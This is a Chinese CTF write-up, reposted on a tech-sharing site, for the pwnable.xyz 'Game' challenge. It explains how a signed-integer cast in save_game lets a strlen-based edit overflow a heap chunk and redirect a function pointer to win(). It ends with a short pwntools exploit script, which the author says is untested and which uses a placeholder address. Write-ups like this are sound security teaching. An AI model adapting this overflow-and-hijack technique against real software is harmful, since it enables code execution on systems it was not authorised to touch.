标签：cur xyz Pwnable game 0x10 Game sh sendlineafter save

0x1，概述。

这道题漏洞主要在于函数save_game函数的有符号整形使edit_name对名字长度误判导致的溢出，仔细观察save_game函数对数字格式的转换再结合堆结构可以直接发现。

0x2，具体解决方案。

先查一波保护：

 具体逻辑分析:

 main()通过菜单选择行为，并回应。

 Play game 通过指针cur+3 实现。

关键就在于save_game()：

之前init_game()函数分配0x20于save[0]，分配0x10字节于*cur[0]存放初始name。

这里又分配0x20内存于save[1]存放第一个分数。

 之后分析play_game()可知我们的分数保存在*cur[1]且类型为word，但在这里18行将其强制转型为有符号int并储存在save[1]。再来看一下堆的情况：

 

由于malloc()函数连续调用，导致cur[0]和save[0]以及save[1]内存块地址连续，当我们分数为-1时，有符号数0xffffff强制转型为qword：

 

edit_game()单纯测量cur(0x6032a0)长度并决定可输入字符数量.

 

 理论我们只能对cur地址进行不超过0x10字节的输入，但只要不存在/x00，strlen()函数就继续计算字符串长度，这就意味着我们可以控制额外8字符。

即可以控制play_game()调用，修改其地址为win()。

shellcode:

from pwn import * 
#Python 3.9.9

sh = remote("svc.pwnable.xyz",30009)

sh.sendafter("Name: ","A" * 0x10)
sh.sendlineafter("> ","1")
sh.sendlineafter("= ","17")
sh.sendlineafter("> ","2")
sh.sendlineafter("> ","3")
sh.send(b'A' * 0x10 + p64(Address_of_win))
sh.sendlineafter("> ","1")
print(sh.recv())

代码未经测试，仅供参考。

0x3，总结。

这题也不难，仔细审计代码和数据结构是关键。

标签：cur,xyz,Pwnable,game,0x10,Game,sh,sendlineafter,save
来源： https://blog.csdn.net/weixin_44195862/article/details/122044121

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。